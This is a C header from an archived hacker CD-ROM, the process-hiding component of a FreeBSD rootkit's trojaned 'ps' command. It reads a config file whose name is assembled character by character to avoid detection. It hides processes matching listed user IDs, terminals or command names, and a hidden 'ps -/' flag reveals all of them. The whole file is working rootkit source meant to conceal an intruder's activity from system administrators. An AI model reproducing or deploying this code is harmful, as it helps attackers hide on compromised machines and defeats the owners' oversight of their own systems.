home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / crh / freebsd / rootkit / ps / rootkitps.h < prev   
Encoding:
C/C++ Source or Header  |  2002-05-27  |  1.9 KB  |  92 lines
  1. #define STR_SIZE    128
  2. #define SEP_CHAR    " \n"
  3. #define SHOWFLAG    /*  Able to list processes with 'ps -/' command  */
  4. #define BY_USER        0
  5. #define BY_TTY        1
  6. #define BY_NAME        2
  7.  
  8. struct h_st {
  9.     struct h_st *next;
  10.     int hack_type;
  11.     char hack_cmd[STR_SIZE];
  12. };
  13.  
  14. struct h_st *hack_list;
  15. struct h_st *h_tmp;
  16.  
  17. char tmp_str[STR_SIZE];
  18. char *strp;
  19.  
  20. FILE *fp_hack;
  21.  
  22. int show_all=0;
  23.  
  24. inline process_block_list()
  25. {
  26.     char PSCONF[10];
  27.  
  28.     PSCONF[0]=ROOTKIT_HIDE_PROCESSES[0];
  29.     PSCONF[1]=ROOTKIT_HIDE_PROCESSES[1];
  30.     PSCONF[2]=ROOTKIT_HIDE_PROCESSES[2];
  31.     PSCONF[3]=ROOTKIT_HIDE_PROCESSES[3];
  32.     PSCONF[4]=ROOTKIT_HIDE_PROCESSES[4];
  33.     PSCONF[5]=ROOTKIT_HIDE_PROCESSES[5];
  34.     PSCONF[6]=ROOTKIT_HIDE_PROCESSES[6];
  35.     PSCONF[7]=ROOTKIT_HIDE_PROCESSES[7];
  36.     PSCONF[8]=ROOTKIT_HIDE_PROCESSES[8];
  37.     PSCONF[9]='\0';
  38.  
  39.     h_tmp=(struct h_st *)malloc(sizeof(struct h_st));
  40.     hack_list=h_tmp; 
  41.  
  42.     if(fp_hack=fopen(PSCONF,"r")) {
  43.         while(fgets(tmp_str, 126, fp_hack)) {
  44.             h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st));
  45.             strp=(char *)strtok(tmp_str, SEP_CHAR);
  46.             h_tmp->hack_type=atoi(strp);
  47.             strp=(char *)strtok('\0', SEP_CHAR);
  48.             strcpy(h_tmp->hack_cmd, strp);
  49.             h_tmp=h_tmp->next;
  50.         }
  51.     }
  52.         
  53.     h_tmp->next=NULL;
  54. }
  55.  
  56. inline int check_process(struct kinfo_proc *kip)
  57. {
  58.     int block=0;
  59.     dev_t dev;
  60.     char *ttname;
  61.  
  62.     for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next) {
  63.         switch(h_tmp->hack_type) {
  64.             case BY_USER:
  65. #ifndef NEWVM
  66.                 if(kip->kp_proc.p_uid==atoi(h_tmp->hack_cmd))
  67. #else
  68.                 if(kip->kp_eproc.e_ucred.cr_uid==atoi(h_tmp->hack_cmd))
  69. #endif
  70.                     block=1;
  71.                 break;
  72.                         case BY_TTY:
  73.                 dev=kip->kp_eproc.e_tdev;
  74.                 if(dev==NODEV||!(ttname=devname(dev,S_IFCHR)))
  75.                     break;
  76.                 else {
  77.                     if(!strncmp(ttname,"tty",3)||!strncmp(ttname,"cua",3))
  78.                         ttname+=3;
  79.                     if(!strcmp(ttname,h_tmp->hack_cmd))
  80.                         block=1;
  81.                 }
  82.                 break;
  83.             case BY_NAME:
  84.                 if(strstr(kip->kp_proc.p_comm,h_tmp->hack_cmd))
  85.                     block=1;
  86.                                 break;
  87.             }
  88.     }
  89.  
  90.     return(block);
  91. }
  92.